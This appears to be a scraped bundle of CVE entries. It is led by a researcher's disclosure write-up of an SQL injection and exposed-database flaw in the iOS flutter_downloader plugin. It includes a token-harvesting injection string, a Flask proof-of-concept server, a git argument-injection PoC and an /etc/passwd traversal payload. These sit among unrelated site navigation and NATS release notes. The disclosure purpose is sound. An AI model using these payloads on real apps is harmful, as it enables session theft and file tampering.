A SQL injection in the flutter_downloader component through 1.11.1 for iOS allows remote attackers to steal session tokens and overwrite arbitrary files inside the app's container. The internal database of the framework is exposed to the local user if an app uses UIFileSharingEnabled and LSSupportsOpeningDocumentsInPlace properties. As a result, local users can obtain the same attack primitives as remote attackers by tampering with the internal database of the framework on the device.

In this blog post, I will share with you a tale of an iOS app that became a victim of a highly exploitable Flutter framework. Unfortunately, this framework is quite popular, leaving many apps vulnerable.

A bad actor can exploit the framework through two vulnerabilities:

*   SQL Injection
*   Misconfiguration

Each leading to the same outcome:

*   Steal user's session token
*   Write an arbitrary file into the user's app container

**The Story**

I'm on a monthly subscription for an iOS workout app that provides me with access to video exercises. Usually, the app needs an Internet connection to stream the videos, but a user can download a few videos for offline usage within the app. One day, I forgot to renew my subscription, and the app blocked my access to the training videos. A few days later, I opened Files app, a filesystem explorer on iOS, and to my surprise, **I saw all the downloaded videos I had to pay for in the past** there. Why would an app store its paid content in a public directory? For sure not out of its own will.

**But there was one more file that surprised me even more.** This file is download\_task.sql, which looks like an internal database of the workout app.

I see how a developer could by accident misplace the videos into a systemwide accessible directory. But I was very surprised to see an internal database there. I AirDropped the download\_tasks.sql to my MacBook for further analysis.

Shocked by the amount of sensitive data waiting for me to tamper with, I knew a great journey was ahead. Goodbye to my 8 hours of sleep…

**Why is the database publicly accessible?**

It is a very unfortunate configuration coincidence. The app uses flutter\_downloader framework to download videos for later usage. The framework maintains an internal database to keep track of scheduled downloads and their status. Flutter\_downloader stores this database inside the app’s container directory, assuming it's accessible privately to the app. **However, the app is configured to make this part of the container public. Therefore, all internal files of the framework are exposed to the public**.

**iOS apps may opt-in to make the Documents directory available systemwide for the user** by enabling UIFileSharingEnabled and LSSupportsOpeningDocumentsInPlace in the Info.plist. Unfortunately, flutter\_downloader uses Documents directory to store its internal files.

Starting from version 1.8.4 (10 months ago), flutter\_downloader stopped using Documents directory for the database but **introduced a new migration logic that left the app with the same vulnerability**. I will describe it more in a next article.

**Exploitation**

In the remaining part of this blog post, I won't target this workout app, or any other app using this flutter\_downloader framework due to ethical and legal concerns. Instead, I created a sample Flutter app that uses flutter\_downloader v1.8.3.

**Extracting the session token**

Flutter\_framework provides the developers with an easy-to-use API to download files.

    final taskId = await FlutterDownloader.enqueue(
      url: // 'your download link',
      headers: {}, // header (auth token etc)
      savedDir: // destination path
    ...
    );
    

Dart

If you need to be signed in to download a file, you can add an Authorization header to the headers argument. Below you can see a sample Authorization header holding a Bearer session token.

     Authorization: Bearer XXXXXXXXX 
    

Once you pass an Authorization header to the flutter\_downloader, it's kept in the database forever. **Unfortunately, this database is publicly accessible via Files app**, so anyone can AirDrop it from your device and check out the content, including the session token headers. This potentially leads to an account takeover.

Below, you can find a demo of a full attack

**Writing an arbitrary file to the app's container**

We already know that we can read and write to the flutter\_downloader's database via the Files app. In this section, I will show you how we can tamper with the database to make the flutter\_downloader write an arbitrary file to the app's container.

Writing an arbitrary file to the container allows the attacker to overwrite the state of unlocked premium features, or the amount of currency in an application.

In the video below, I show how we can make flutter\_downloader overwrite a file storing the amount of dollars in the app.

This attack is possible because once the attacker has control over the database, it can make flutter\_downloader download any file from the Internet and store it at an arbitrary location. The code below shows the vulnerable part of the framework, which overwrites any file at a given path from the database.

    // Source: https://github.com/fluttercommunity/flutter_downloader/blob/447702e336345157a4cd8302d68c81a03bb80ac1/ios/Classes/FlutterDownloaderPlugin.m#L962
          
    - (void)URLSession:(NSURLSession *)session downloadTask:(NSURLSessionDownloadTask *)downloadTask didFinishDownloadingToURL:(NSURL *)location
    {
        // Get the destination file path from the publicly exposed database
        NSURL *destinationURL = [self fileUrlOf:taskId taskInfo:task downloadTask:downloadTask];
    
        // Overwrite the old file at the destination path
        if ([fileManager fileExistsAtPath:[destinationURL path]]) {
            [fileManager removeItemAtURL:destinationURL error:nil];
        }
    
        // Overwrite an arbitrary file
        BOOL success = [fileManager copyItemAtURL:location
                                    toURL:destinationURL
                                    error:&error];
    } 
    

Objective-C

  
**Exploiting the SQL Injection**

Below, you can find a part of flutter\_downloader that is vulnerable to SQL Injection.

    // Source: https://github.com/fluttercommunity/flutter_downloader/blob/447702e336345157a4cd8302d68c81a03bb80ac1/ios/Classes/FlutterDownloaderPlugin.m#L444
    NSString *query = [NSString stringWithFormat:
       @"UPDATE task SET file_name=\"%@\" WHERE task_id=\"%@\"",
       filename, taskId];
    [_dbManager executeQuery:query];
    

Objective-C

The String Interpolation inserts the filename just after file\_name=".  
If a bad actor can control the content of filename, they can set it to e.g.  
whatever", url="https://janhacks.re", status=4 where 1 = 1 ;--

After the injection, the complete SQL query will look like this:

    UPDATE task SET file_name="whatever", url="https://janhacks.re", status=4 where 1 = 1 ;-- " WHERE task_id="%@"
    

SQL

" WHERE task\_id=\\"%@\\"" won't be executed because it's commented out.

This query will change the URL of every task in the database to http://janhacks.re and update its status to Failed. When a user opens the app next time, the frameworks will resume failed tasks and send X requests to http://janhacks.re. These requests will contain headers used for the previous downloads. This means the attacker's server will harvest session tokens of every request done by the framework.

**Controlling the filename variable**

Below you can see that Flutter\_downloader blindly uses a filename given by the server and stores it in the database. Then, the attacker can use it as an attack primitive for either SQL Injection, and overwriting an arbitrary file.

     // Source: https://github.com/fluttercommunity/flutter_downloader/blob/447702e336345157a4cd8302d68c81a03bb80ac1/ios/Classes/FlutterDownloaderPlugin.m#L340
    - (NSURL*)fileUrlOf:(NSString*)taskId taskInfo:(NSDictionary*)taskInfo downloadTask:(NSURLSessionDownloadTask*)downloadTask {
        NSString *filename = taskInfo[KEY_FILE_NAME];
        NSString *suggestedFilename = downloadTask.response.suggestedFilename;
        // Update the database with the vulnerable UPDATE query
        [weakSelf updateTask:taskId filename:filename]
    }
    

Objective-C

The next step is to set up an HTTPS server that can provide us with a malicious filename. Below you can find my POC.

    from flask import Flask, Response, request
    import urllib.parse
    app = Flask(__name__)
    
    @app.route('/evil/injection')
    def injection():
        content = "77777"
        # Use nested SQL Injection to trick the filename sanitizer
        filename = 'injection", url=(SELECT url from task where id = 2), status=4, progress=0 WHERE 1=1; --'
        encoded_filename = urllib.parse.quote(filename)
        response = Response(content, content_type='text/plain')
        response.headers['Content-Disposition'] = f'attachment; filename="{encoded_filename}"; filename*=utf-8''{encoded_filename}'
        return response
    
    @app.route('/evil/log')
    def log_headers():
        print(request.headers)
        return "OK"
    
    if __name__ == '__main__':
        app.run(debug=True, host="0.0.0.0", port=8282)
    

Python

*   /evil/injection - injects the SQL Inejction into the database
*   /evil/log - logs all headers from the incomming requests

**An attacker can exploit this vulnerability to:**

*   **Steal the user's session cookie** - by replacing all URLs in the database with the attacker's domain
*   **Write to an arbitrary file** - by replacing one URL

Below is a demo of both vulnerabilities:

**Summary**

When securing your app, make sure to know your dependencies. Ensure they are not vulnerable to common attacks, and they play well with your app's configurations - e.g. they don't store sensitive data inside directories your app makes public.

**Scale of the problem**

According to the main repository of Flutter - Pub.dev, flutter\_downloader framework has the popularity score of **99%.**

_“Popularity measures the number of apps that depend on a package over the past 60 days. We show this as a percentile from 100%”_ **~ PubDev**

This provides only an estimate of the number of vulnerable apps. To proactively help the affected apps, I automated the process of downloading apps from the AppStore to search for those that might be vulnerable. Notably, I've **discovered several banking apps that rely on this compromised framework**. All the identified apps have been notified.

**The vulnerabilities have been fixed in flutter\_downloader v1.11.2.**

**Timeline:**

*   **August 25th** - I notified the maintainers of flutter\_downloader about the vulnerabilities
*   **August 26th** - The maintainers acknowledged the vulnerabilities
*   **2 weeks** of working together on the mitigations
*   **September 12th** - A new version of flutter\_downloader with the mitigation was released

CVE-2023-41387: Exploiting iOS apps to extract session tokens and overwrite user data

An issue has been discovered in GitLab EE affecting all versions starting from 13.12 before 16.2.7, all versions starting from 16.3 before 16.3.4. It was possible for an attacker to run pipeline jobs as an arbitrary user via scheduled security scan policies. This was a bypass of [CVE-2023-3932](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3932) showing additional impact.

CVE-2023-5009

The Super Store Finder plugin for WordPress is vulnerable to unauthenticated arbitrary email creation and relay in versions up to, and including, 6.9.2. This is due to insufficient restrictions on the sendMail.php file that allows direct access. This makes it possible for unauthenticated attackers to send emails utilizing the vulnerable site's server, with arbitrary content. Please note that this vulnerability has already been publicly disclosed with an exploit which is why we are publishing the details without a patch available, we are attempting to initiate contact with the developer.

*   Products
*   About Us
*   Live Demos
    
    *   Super Store Finder
    *   Addon - Custom Marker
    *   Addon - Marker Clusterer
    *   Addon - Multi Categories
    *   Addon - Exact Geo
    *   Theme - Mega Locator
    *   Theme - Compact
    *   Super Store Finder for Wordpress
    *   WP Addon - Custom Marker
    *   WP Addon - Marker Clusterer
    *   WP Addon - Multi Category
    *   WP Addon - Distance Radius
    *   WP Addon - Reviews & Ratings
    *   WP Addon - Google Reviews
    *   Super Logos Showcase
    *   Super Product Variation Swatches
    *   Super Responsive Accordion
    *   WP Comment Image/Video
    *   Super Interactive Maps
    
    *   **Standalone** Store Finder
    *   Custom Marker
    *   Marker Clusterer
    *   Multi Category
    *   Exact Geo
    *   Mega Locator
    *   Compact
    
    *   **WordPress** Store Finder
    *   Custom Marker
    *   Marker Clusterer
    *   Multi Category
    *   Distance Radius
    *   Social Ratings
    *   Google Reviews
    *   Logos Showcase
    *   Swatches
    *   Accordion
    *   WP Comments
    *   Vector Maps
    
*   Community
    *   Forums
    *   Testimonials
    *   Affiliate Partner
    *   Free Markers
    *   Free Skins
    *   Patch Notes
    *   Real Examples
    *   Latest News
    *   Facebook
    *   Instagram
    *   Twitter
    *   Youtube
*   Knowledge Base
*   Support
*   *   About Us
    *   Support
    *   Forums
    *   Testimonials
    *   Knowledge Base
    *   Affiliates
    *   Jobs
    *   Real Examples
    *   Latest News
    *   Privacy Policy
    *   AudioJungle
    *   ThemeForest
    *   VideoHive
    *   GraphicRiver
    *   3DOcean
    *   CodeCanyon
    *   Tuts+ Marketplace
    *   PhotoDune
    *   Best Hosting/Domain
    *   Terms of Service

*   **Newsletter**
    
    Join our newsletter to get updates on the latest news, tips, patch releases and upcoming products.
    
*   © Copyright 2023 Super Store Finder. All rights reserved.

CVE-2023-5054: Super Store Finder - Best Selling Store Locator Plugin

Versions of the package blamer before 1.0.4 are vulnerable to Arbitrary Argument Injection via the blameByFile() API. The library does not sanitize for user input or validate the given file path conforms to a specific schema, nor does it properly pass command-line flags to the git binary using the double-dash POSIX characters (--) to communicate the end of options.

**Arbitrary Argument Injection Affecting blamer package, versions **<1.0.4****

**Threat Intelligence**

Exploit Maturity Proof of concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   Snyk ID **SNYK-JS-BLAMER-5731318**
*   published **18 Sep 2023**
*   disclosed **22 Jun 2023**
*   credit **Liran Tal**

**How to fix?**

Upgrade blamer to version 1.0.4 or higher.

**Overview**

blamer is a tool for get information about author of code from version control system. Supports git and subversion.

Affected versions of this package are vulnerable to Arbitrary Argument Injection via the blameByFile() API. The library does not sanitize for user input or validate the given file path conforms to a specific schema, nor does it properly pass command-line flags to the git binary using the double-dash POSIX characters (--) to communicate the end of options.

**PoC**

    import Blamer from "blamer";
    const blamer = new Blamer.default("git");
    
    async function main() {
      const file = "--output=/tmp/r2d2";
      const result = await blamer.blameByFile(file);
      console.log("Blame json: %j", result);
    }
    
    main();

CVE-2023-26143: Snyk Vulnerability Database | Snyk

Cross Site Scripting vulnerability in xdsoft.net Jodit Editor v.4.0.0-beta.86 allows a remote attacker to obtain sensitive information via the rich text editor component.

CVE-2023-42399

Cross-site Scripting (XSS) - DOM in GitHub repository librenms/librenms prior to 23.9.1.

CVE-2023-5060

An issue in the component /common/DownController.java of JFinalCMS v5.0.0 allows attackers to execute a directory traversal.

> source code: https://gitee.com/heyewei/JFinalcms
> 
> Official website : http://www.jrecms.com/product/201.html

**Analyze:**

The vulnerable file is in com/cms/controller/common/DownController.java

We can easily find that the file function concatenates the file name of the fileKey parameter as a string directly with the overall file path, without performing black and white list verification or security verification, which allows us to utilize/ Perform directory traversal

poc:

1  
2  
3  

    I set a test.txt in E:\test.txt.And this java sysytem is also set in E-disk.Windows: /../../../../../../../../../test.txtLinux:	/../../../../../../../../../etc/passwd

CVE-2023-41599: Directory traversal in JFinalCMS

NATS nats-server 2.2.0 through 2.7.4 allows directory traversal because of an unintended path to a management action from a management account.

**Release v2.9.22**

**Changelog****Go Version**

*   1.20.8 (updated out-of-cycle since Go 1.19 is now EOL)

**Dependencies**

*   github.com/nats-io/jwt/v2 v2.5.0
*   golang.org/x/crypto v0.12.0
*   golang.org/x/sys v0.11.0

**Improved**

Monitoring

*   CORS Allow-Origin passthrough for monitoring server (#4423) Thanks to @mdawar for the contribution!

JetStream

*   Improve consumer scaling reliability with filters and cluster restart (#4404)
*   Send event on lame duck mode (LDM) to avoid placing assets on shutting down nodes (#4405)
*   Skip filestore tombstones if downgrade from 2.10 occurs (#4452)
*   Adjust delivered and waiting count when consumer message delivery fails (#4472)

**Fixed**

Config

*   Allow empty configs and fix JSON compatibility (#4394, #4418)
*   Remove TLS OCSP debug log on reload (#4453)

Monitoring

*   Fix Content-Type header when /healthz is not 200 OK (#4437) Thanks to @mdawar for the contribution!
*   Fix server /connz idle time sorting (#4463) Thanks to @mdawar for the contribution!
*   Interface conversion bug which could cause a panic when calling /ipqueuesz endpoint (#4477)

Leafnode

*   Fix race condition which could affect propagating interest over leafnode connections (#4464)

JetStream

*   Fix possible deadlock in checking for drift in the usage reporting when storing a message (#4411)
*   Durable pull consumers could get cleaned up incorrectly on leader change (#4412)
*   Moving an R1 stream could sometimes lose all messages (#4413)
*   Prevent peer-remove of an R1 stream which could result in the stream becoming orphaned (#4420)
*   Ensure consumer ack pending is less than max ack pending on state restore (#4427)
*   Ensure to reset election timer when catching up (#4428) Thanks to @yuzhou-nj for the report!
*   Auto step-down Raft leader if an entry is missing on a catchup request (#4432)
*   Fix PurgeEx with keep having deletes in blocks (#4431)
*   Update global subject index when message blocks expire (#4439)
*   Ensure max messages per subject is respected after update (#4446) Thanks to @anthonyjacques20 for the report!
*   Ignore and remove empty message blocks on rebuild (#4447)
*   Fix possible accounting discrepancy on message write (#4455)
*   Fix potential message duplication from stream sources when downgrading from 2.10 (#4454)
*   Check for checksum violations for all records before sequence processing (#4465)
*   Fix message block accounting (#4473)

**Complete Changes**

v2.9.21...v2.9.22

**Release v2.9.21**

**Changelog****Go Version**

*   1.19.12

**Dependencies**

*   github.com/klauspost/compress v1.16.7
*   github.com/nats-io/nats.go v1.28.0
*   go.uber.org/automaxprocs v1.5.3
*   golang.org/x/crypto v0.11.0
*   golang.org/x/sys v0.10.0

**Added**

OCSP

*   Add fetch, cache, and verification of client CA's OCSP Response for NATS, WebSocket, and MQTT client mTLS connections (#4362, backported from 2.10)
*   Add bi-directional fetch, cache, and verification of CA OCSP Response for LEAF connections (#4362, backported from 2.10)

See ADR-38 OCSP Peer Verification

General

*   Add UTC log timestamp option (#4331, backported from 2.10)

**Improved**

JetStream

*   Don't error to server logs if message was deleted for consumer (#4328)
*   Improve publish performance for zero-interest subjects (#4359) Thanks to @antlad for reporting the issue!
*   Sync and reset message rejected count to ensure replicas don’t incorrectly discard messages (#4365, #4366)

**Fixed**

General

*   Leaking memory on usage of getHash() (#4329) Thanks to @VuongUranus for reporting the issue!
*   Server reload with highly active accounts and service imports could cause panic or dataloss (#4327)
*   Fix detection of an unusable configuration file (#4358)
    *   **NOTE: as a side effect of this fix, the server will no longer startup with an empty config file**
*   Fix a few system service imports going missing after configuration reload (#4360)

OCSP

*   Fix local-determination of issuer CA at startup (#4362)
*   Remove constraint that all (super)cluster node peers must be issued by the same CA (#4362)

Embedded

*   Don't require TLS for in-process client connection (#4323)

JetStream

*   Fix serializability guarantee for concurrent publish when using expected-last-subject-sequence (#4319)
*   Report correct consumer count in paged list response (#4339)
*   Fix not validating single token filtered consumer (#4338)
*   Fix stream recovery of message block with sequence gaps (#4344)
*   Fix panic when re-calculating first sequence of SimpleState info (#4346)
*   Fix stream store accounting drift (#4357)

**Complete Changes**

v2.9.20...v2.9.21

**Release v2.9.20**

**Changelog****Go Version**

*   1.19.11

**Added**

Windows

*   Backport 2.10 support for native Windows certificate store (#4268)

**Improved**

Accounts

*   Allow advisories to be exported/imported across accounts (#4302)

JetStream

*   Optimize consumer create time on streams with a large number of blocks (#4269)

**Fixed**

Gateways

*   Protect possible data race when reloading accounts (#4274)

Leafnodes

*   Prevent zombie subscriptions which could lead to silent data loss when using queue subscriptions (#4299)

WebSocket

*   Prevent reporting tls_required when tls_available is not set (#4264)

JetStream

*   Prevent corrupting streams actively being restored during health check (#4277) Thank you @vitush93 for the report!
*   Prevent encrypted data attempting to be decrypted with an empty key (#4301)

MQTT

*   Ensure republished messages from streams are received by MQTT subscriptions (#4303)

**Complete Changes**

v2.9.19...v2.9.20

**Release v2.9.19**

**Changelog****Go Version**

*   1.19.10

**Improved**

JetStream

*   Improve resource utilization when creating mirrors on very high-sequence streams (#4249)

**Fixed**

WebSocket

*   Ensure INFO properties are populated based on the WebSocket listener when enabled (#4255) Thanks to @Envek for reporting the issue!

**Complete Changes**

v2.9.18...v2.9.19

**Release v2.9.18**

**Changelog****Go Version**

*   1.19.10

**Dependency Updates**

*   golang.org/x/crypto v0.9.0 (#4236)
*   golang.org/x/sys v0.8.0 (#4236)
*   github.com/nats-io/nats.go v1.27.0 (#4239)

**Improved**

Monitoring

*   Optimize /statsz locking and sending in standalone mode (#4235)

JetStream

*   Apply ack floor check only for interest-based streams (#4206)
*   Improved efficiency and reduced CPU usage of the consumer ack floor check, particularly when the stream first sequence is a large number (#4226)
*   Improve clean-up phase of R1 consumers on server restart for name reuse (#4216)
*   Optimize “last message lookups” by subject (KV get operations) for small messages (#4232) Thanks to @jjthiessen for reporting the issue!
*   Only enable JetStream account updates in clustered mode (#4233) Thanks to @tpihl for reporting the issue!

**Fixed**

General

*   Fix a variety of potential panic scenarios (#4214) Thanks to @Zamony and @artemseleznev for the contribution!

Leadnode

*   Daisy chained leafnodes could have unreliable interest propagation (#4207)
*   Properly distribute requests to queue groups across leafnodes (#4231)

JetStream

*   Killed server on restart could render encrypted stream unrecoverable (#4210) Thanks to @BhatheyBalaji for the report!
*   Fix a few data races detected internal testing (#4211)
*   Process extended purge operations correctly when being replayed (#4212, #4213) Thanks to @MauriceVanVeen for the report and contribution!

**Complete Changes**

v2.9.17...v2.9.18

**Release v2.9.17**

**Changelog****Go Version**

*   1.19.9

**Dependency Updates**

*   github.com/klauspost/compress v1.16.5 (#4088)

**Improved**

Core

*   Additional optimizations to outbound queues, reducing memory footprint (#4084, #4093, #4139)
*   Use faster flate compression library for WebSocket transport compression (#4087)

Leafnodes

*   Optimize subscription interest propagation for large leafnode fleet (#4117, #4135)

Monitoring

*   Support sorting by RTT for /connz (#4157)

Resolver

*   Improve signaling for missing account lookups (#4151)

JetStream

*   Optimized determining if a stream snapshot is required (#4074)
*   Run periodic check for consumer “ack floor” drift on leader (#4086)
*   Optimize leadership transfer during a stream migration (#4104)
*   Improve how clustered consumer state is hydrated on startup (#4107)
*   Add operation type to panic messages for improved debugging (#4108)
*   Improve health check to repair stalled assets periodically (#4116, #4172)
*   Remove unnecessary filestore lock to improve I/O performance (#4123)
*   Various Raft leadership improvements (#4126, #4142, #4143, #4145)
*   Improve accuracy of account usage (#4131)
*   Clean up old Raft groups when streams are reset (#4177)

**Fixed**

General

*   Fix various names in comments (#4099) Thanks to @cuishuang for the contribution!
*   Fix various typos in comments (#4169) Thanks to @savion1024 for the contribution!
*   Update tests to reflect the server.Start() call no longer blocks (#4111) Thanks to @lheiskan for reporting the issue!
*   Fix race condition in config reload with gateway sublist check (#4127)
*   Track all remote servers in a NATS system with different domains (#4159)

Core

*   Fix premature closing in WebSocket transport due to outbound queue changes (#4084)
*   Fix subscription interest for config-based accounts during config reload (#4130)
*   Use monotonic time for measuring durations internally (#4132, #4154, #4163)

Monitoring

*   Service import reporting for /accountz when mapping to local subjects (#4158)

JetStream

*   Fix formatting of Raft debug log (#4090)
*   Prevent failure of /healthz in single server mode on failed snapshot restore (#4100)
*   Ensure a stream Raft node has fully stopped and resources freed (#4118)
*   Fix case where R1 streams are orphaned and can’t scale up (#4146)
*   Protect against out of bounds access on usage updates (#4164)
*   Fix state rebuild where the first block is truncated and missing index info (#4166)
*   Avoid stale KV reads on server restarted for replicated stores (#4171) Thanks to @yixinin for reporting the issue!
*   Prevent deadlock with usage report for accounts (#4176)

**Complete Changes**

v2.9.16...v2.9.17

**Release v2.9.16**

**Changelog****Go Version**

*   1.19.8

**Dependency Updates**

*   github.com/klauspost/compress v1.16.4
*   github.com/nats-io/jwt/v2 v2.4.1
*   github.com/nats-io/nkeys v0.4.4
*   golang.org/x/crypto v0.8.0
*   golang.org/x/sys v0.7.0

**Added**

Build

*   Nightly build of the “main” branch as a Docker image: synadia/nats-server:nightly-main (#3961, #3962, #3963, #3972, #4019, #4063)
*   Version control SHA in the Goreleaser build of the server (#3993). Thanks for the report @jzhoucliqr!  
    Monitoring
*   Add server name and route remote server name to /routez (#4054)

Resolver

*   Add “hard\_delete” option for stored JWTs (#3783). Thanks for the contribution @JulienVdG!

**Improved**

JetStream

*   Storage and Raft layer improvements to decrease p99 latency variance and memory pressure in high load environments (#3956, #3952, #3965, #3981, #3999, #4018, #4020, #4021, #4022, #4026, #4027, #4028, #4029, #4030, #4038, #4045, #4050, #4053)
*   Don’t show Raft warning for node that is closed (#3968)
*   Use pooled buffer for flushing encrypted message blocks (#3975)
*   Remove snapshotting of cores and maxprocs (#3979)
*   Improvements to interest-based streams to optimize when messages are deleted (#4006, #4007, #4012)
*   Better handling of concurrent stream and consumer creation of the same name (#4013)
*   Finer-grain locking during asset checking to reduce contention in the /healthz endpoint (#4031)
*   Encrypted file stores will now limit block sizes to improve performance (#4046)
*   Improve performance on storing messages with varying subjects and limits are imposed (#4048, #4057). Thanks for the report @kung-foo!

**Fixed**

Subjects

*   Ensure subjects containing percent (%) are escaped (#4040)

Accounts

*   Fix data race when setting up service import subscriptions (#4068)

Leaf

*   Fix leaf client connection failing on OCSP setups (#3964)
*   Fix case when allow/deny permissions on leaf connection could block legitimate interest (#4032)

Cluster

*   Route disconnect not detected by ping/pong (#4016). Thanks for the contribution @sandykellagher!

JetStream

*   Pull consumer not sending timeout error to clients for expired requests (#3942)
*   Prevent meta leader deadlock during deletion of orphaned streams during server startup (#3945)
*   Clear ack’ed messages when scaling workqueue or interest-based streams (#3960) Thanks for the report @Kaarel!
*   Remove messages from interest-based stream on consumer snapshot (#3970)
*   Fix potential panic in message block buffer pool (#3978)
*   Fixed an issue with consumer states growing and causing instability (#3980)
*   Improve handling of out-of-storage condition (#3985)
*   Address memory leak of unreachable Raft groups when JetStream becomes disabled (#3986)
*   Prevent Raft leader from being placed on server in lame-duck mode (#4002)
*   Remove potential race condition on sysRequest (#4017)
*   Fix FirstSeq not being updated with filestore when purging subject (#4041). Thanks for the contribution @MauriceVanVeen!
*   Fix Raft log debug reloading (#4047)
*   Ensure consumer recovers fully on restart before being eligible for leader (#4049)
*   Fix incorrect check between stream source/mirror with external streams (#4052)
*   Fix various conditions during Raft group recovery (#4056, #4058)

**Complete Changes**

v2.9.15...v2.9.16

**Release v2.9.15**

**Changelog****Go Version**

*   1.19.6: Both the release executables and Docker images are built with this Go release

**Added**

*   Monitoring
    *   Add raft query parameter to /jsz to include group info (#3915)
    *   Update /leafz to include leaf node remove server name and “spoke” flag (#3923, #3925)

**Changed**

*   Lower default value of jetstream.max_outstanding_catchup to prevent slow consumers between routes (#3922)
    *   **Note: The new value is now 64MB from 128MB. This is better optimized for 1 Gbit links, however if your links are 10 Gbit or higher, this value can be set back to 128MB if slow consumers were not previously observed.**

**Improved**

*   Refactor intra-process queue to reduce allocations (#3894)
*   JetStream
    *   Better system stability and recovery from corrupt metadata due to hard forced restarts (#3934)
    *   Optimize on-disk, per-subject info update (#3867)
    *   Limit concurrent blocking IO to improve stability under heavy IO loads (#3867)
    *   Improve message expiry calculation for large numbers of messages (#3867)
    *   Optimize when and how consumer num pending is calculated, significantly speeding up consumer info requests (#3877)
    *   Improve parallel consumer creation to prevent dropped messages (#3880)
    *   Properly warn on consumer state update state failures (#3892)
    *   Performance of consumer creation for certain configurations (#3901)
    *   Send current snapshot to followers when becoming meta-leader (#3904)
    *   Ensure preferred peer during stepdown is healthy (#3905)
    *   Optimized various store calls on stream state (#3910)
    *   Various performance and stability under heavy IO loads (#3922) (Thank you @matkam and @davidzhao for the report and the test harness!)

**Fixed**

*   Fix stack overflow panic in reverse entry check when inbox ends with wildcard (#3862)
*   Check if client connection name was already set when storing, preventing recursive memory growth (#3886)
*   Fix check for count of wildcard tokens in “partition” subject transform (#3887) (Thank you @MauriceVanVeen for the contribution!)
*   Fix panic if service export is nil (#3917) (Thank you @MauriceVanVeen for the report!)
*   JetStream
    *   Ensure per-subject info is updated when doing stream compact (#3860)
    *   Ensure account usage is updated in the filestore when extended version purge occurs (#3876)
    *   Prevent consumer deletes on restart, with non-fatal errors (#3881)
    *   Do not warn if consumer replicas is zero since it will be inherited from the stream (#3882)
    *   Named push consumers with inactive thresholds deleted when still active (#3884)
    *   Prevent spurious “Error storing entry to WAL” log messages (#3893, #3891)
    *   Clean up consumer redelivery state on stream purge (#3892)
    *   Clean up consumer ack pending if below stream ack floor (#3892)
    *   Update ack floors on messages being expired (#3892)
    *   Fix lost ack pending consumer state on partial stream purge (#3892)
    *   Snapshot and compact the consumer RAFT WAL, even when state changes do not occur, to prevent excessive disk usage (#3898)
    *   Fix KV accounting errors under heavy concurrent usage (#3900)
    *   Ensure new replicas respect MaxAge when a stream is scaled up (#3861)
    *   Snapshots would not compact after being applied (#3907)
    *   Fix filtered pending state calculation (#3910)
    *   Recover from a failed truncate on raft WAL (#3911)
    *   Fix JWT claims update if headers are passed (#3918)
*   MQTT
    *   Prevent use of wildcard characters with topics beginning with $, per the MQTT spec violation 4.7.2-1 (#3926) (Thank you @dominikh for the report!)

**Dependency Updates**

*   klauspost/compress - v1.16.0
*   nats-io/nats.go - v1.24.0
*   golang.org/x/crypto - v0.6.0
*   golang.org/x/sys - v0.5.0

**Complete Changes**

v2.9.14...v2.9.15

**Release v2.9.14**

**Changelog****Go Version**

*   1.19.5: Both the release executables and Docker images are built with this Go release

**Fixed**

*   JetStream
    *   Fix circumstance when an empty snapshot could be written (#3844)
    *   Fix possible panic and deadlock during a consumer filter subject update (#3845)
    *   Fix consumer snapshot logic (#3846)

**Complete Changes**

v2.9.12...v2.9.14

**Release v2.9.12**

**Changelog**

**NOTE: regressions were found in this release. Please skip this and go directly to the v2.9.14 release.**

**Go Version**

*   1.19.5: Both the release executables and Docker images are built with this Go release

**Added**

*   OS/Arch
    *   Add support for dragonfly BSD (#3804)

**Improved**

*   JetStream
    *   Use highwayhash to optimize difference tracking for stream, consumer, and cluster snapshots (#3780)
    *   Add small tolerance in lag for stream and consumer health checks (#3794)
    *   Various optimizations related to snapshots and memory usage (#3828, #3831, #3837) Thanks to @MauriceVanVeen for the collaboration on this issue.

**Fixed**

*   JetStream
    *   Update numCores and maxProcs if altered by container limits (#3796)
    *   Fix filtered state for all subjects when the first sequences are deleted (#3801)
    *   Updating a stream to direct gets would fail direct gets (#3806)
    *   Force consumer replicas to match for interest-based policy streams (#3817)
    *   Assign signal subscription to consumer when created (#3808)
    *   Properly process updates on a stream on restart (#3818)
    *   Select consumer peer(s) from active/online peers only on creation (#3821)
    *   Sourced streams that do not overlap subjects were incorrectly reported as a cycle (#3825)
    *   Fix for isGroupLeaderless when JS not available due to shutdown (#3830)
    *   Deadlock on data loss when holding mb lock (#3832)
    *   Fix consumer not getting messages after filter update (#3829)
    *   Fix current consumers not getting messages after purge (#3838) Thanks to @pcsegal for the report!

**Updated Dependencies**

*   github.com/klauspost/compress - v1.15.15
*   github.com/nats-io/nats.go - v1.23.0
*   golang.org/x/time - v0.3.0

**Complete Changes**

v2.9.11...v2.9.12

CVE-2022-28357: Releases · nats-io/nats-server

SpringBlade <=V3.6.0 is vulnerable to Incorrect Access Control due to incorrect configuration in the default gateway resulting in unauthorized access to error logs

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-40788: SpringBlade/blade-gateway/src/main/java/org/springblade/gateway/provider/AuthProvider.java at master · chillzhuang/SpringBlade

SQL Injection vulnerability in SearchTextBox parameter in Fortra (Formerly HelpSystems) DeliverNow before version 1.2.18, allows attackers to execute arbitrary code, escalate privileges, and gain sensitive information.